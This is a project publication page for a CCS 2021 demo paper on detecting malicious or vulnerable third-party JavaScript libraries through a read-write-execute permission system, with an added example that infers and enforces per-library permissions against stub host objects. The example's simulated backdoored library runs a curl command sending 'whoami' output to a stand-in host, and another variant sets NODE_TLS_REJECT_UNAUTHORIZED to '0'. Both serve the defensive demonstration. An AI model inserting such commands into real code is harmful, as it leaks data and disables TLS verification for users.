Demo: Detecting Third-Party Library Problems with Combined Program Analysis

Partner

The Telecommunication Systems Institute

Authors

Grigoris Ntousakis, Sotiris Ioannidis, and Nikos Vasilakis

Title

Demo: Detecting Third-Party Library Problems with Combined Program Analysis

Open Access

To be provided soon

Abstract

Third-party libraries ease the software development process and thus have become an integral part of modern software engineering. Unfortunately, they are not usually vetted by human developers and thus are often responsible for introducing bugs, vulnerabilities, or attacks into programs that will eventually reach end-users. In this demonstration, we present a combined static and dynamic program analysis for inferring and enforcing third-party library permissions in server-side JavaScript. This analysis is centered around an RWX (read-write-execute) permission system across library boundaries. We demonstrate that our tools can detect zero-day vulnerabilities injected into popular libraries and often missed by state-of-the-art tools such as snyk test and npm audit.
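To make the RWX-across-library-boundary idea concrete, the following JavaScript sketch is an added example written for this page; it is not the authors' tool, whose internals the abstract does not describe. A library receives the host objects it may reach (stand-ins for `fs`, `child_process` and `process`, constructed here and touching neither the real filesystem nor a real shell) through a Proxy that classifies every property read as `r`, every write as `w` and every call as `x`, keyed by the dotted path from the boundary. Phase 1 runs the library on a normal workload and records the set of permissions it needs (only the dynamic half of inference; the static half is not shown). Phase 2 re-runs it under that policy and flags anything outside it, which is how an injected payload in an otherwise identical library becomes visible. The three library functions are constructed for the example.

```javascript
// Added example (not the authors' tool): a toy RWX permission system across
// a library boundary in server-side JavaScript.

// Constructed stand-ins for what a library can reach across its boundary.
// Nothing here touches the real filesystem or spawns a process.
const host = {
  fs: { readFileSync: (p) => (p === "/etc/app.conf" ? "debug=false" : "") },
  child_process: { execSync: (cmd) => `ran: ${cmd}` },
  process: { env: { CONFIG_PATH: "/etc/app.conf" } },
};

class PermissionViolation extends Error {}

// policy: Map<dottedPath, Set<'r'|'w'|'x'>>.
// mode "infer" records every access; mode "enforce" throws on any access
// not already in the policy.
function wrap(target, path, policy, mode) {
  const check = (key, op) => {
    const have = policy.get(key) || new Set();
    if (mode === "infer") {
      have.add(op);
      policy.set(key, have);
    } else if (!have.has(op)) {
      throw new PermissionViolation(`${op} on ${key} not permitted`);
    }
  };
  const keyFor = (prop) => (path ? `${path}.${String(prop)}` : String(prop));
  return new Proxy(target, {
    get(t, prop, receiver) {
      if (typeof prop === "symbol") return Reflect.get(t, prop, receiver);
      const key = keyFor(prop);
      check(key, "r"); // reading a property is an 'r' on its path
      const value = Reflect.get(t, prop, receiver);
      if (typeof value === "function") {
        // Calling through the boundary is an 'x' on the function's path.
        return new Proxy(value, {
          apply(fn, _thisArg, args) {
            check(key, "x");
            return Reflect.apply(fn, t, args);
          },
        });
      }
      if (value !== null && typeof value === "object") {
        return wrap(value, key, policy, mode); // nested objects stay guarded
      }
      return value;
    },
    set(t, prop, value) {
      check(keyFor(prop), "w"); // assigning a property is a 'w' on its path
      return Reflect.set(t, prop, value);
    },
  });
}

// Phase 1: dynamic inference over a workload of inputs.
function inferPermissions(lib, workload) {
  const policy = new Map();
  for (const input of workload) lib(wrap(host, "", policy, "infer"), input);
  return policy;
}

// Phase 2: enforcement; a violation is reported instead of crashing the host.
function enforce(lib, policy, input) {
  try {
    return { ok: true, value: lib(wrap(host, "", policy, "enforce"), input) };
  } catch (e) {
    if (e instanceof PermissionViolation) return { ok: false, error: e.message };
    throw e;
  }
}

// Constructed "library": reads the config file named by an environment variable.
function benignLib(ctx) {
  return ctx.fs.readFileSync(ctx.process.env.CONFIG_PATH).toUpperCase();
}
// Same library with an injected payload that exfiltrates via a shell command.
function backdooredLib(ctx) {
  ctx.child_process.execSync("curl http://example.invalid/$(whoami)");
  return benignLib(ctx);
}
// Same library with an injected write to the host environment.
function envTamperLib(ctx) {
  ctx.process.env.NODE_TLS_REJECT_UNAUTHORIZED = "0";
  return benignLib(ctx);
}

// Render the policy as sorted "path:ops" strings for inspection.
function policyToStrings(policy) {
  return [...policy.keys()].sort().map(
    (k) => `${k}:${["r", "w", "x"].filter((op) => policy.get(k).has(op)).join("")}`
  );
}

function demo() {
  const policy = inferPermissions(benignLib, [undefined]);
  return {
    policy: policyToStrings(policy),
    benign: enforce(benignLib, policy),
    backdoored: enforce(backdooredLib, policy),
    tamper: enforce(envTamperLib, policy),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the inferred policy granting `fs.readFileSync:rx` and reads under `process.env`, the unmodified library passing, and both modified variants stopped at their first out-of-policy access (`r on child_process`, `w on process.env.NODE_TLS_REJECT_UNAUTHORIZED`). The caveat this toy makes obvious is that purely dynamic inference only covers paths the workload exercised, so a legitimate but unexercised access would also be blocked; that is the gap the abstract's combination with static analysis is there to close.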

Publication medium

conference

Name

ACM/SIGSAC Conference on Computer and Communications Security (CCS)

Date of the conference:

15-19 November 2021

Location

Virtual

Is this a peer-reviewed publication?

Yes

Is this a joint public/private publication?

No

KEY FACTS

Project Coordinator: Sofoklis Efremidis
Institution: Maggioli SPA
Email: info{at}cyrene.eu
Start: 1-10-2020
Duration: 36 months
Participating organisations: 14
Number of countries: 10

FUNDING

This project has received funding from the European Union's Horizon 2020 Research and Innovation program under grant agreement No 952690. The website reflects only the view of the author(s) and the Commission is not responsible for any use that may be made of the information it contains.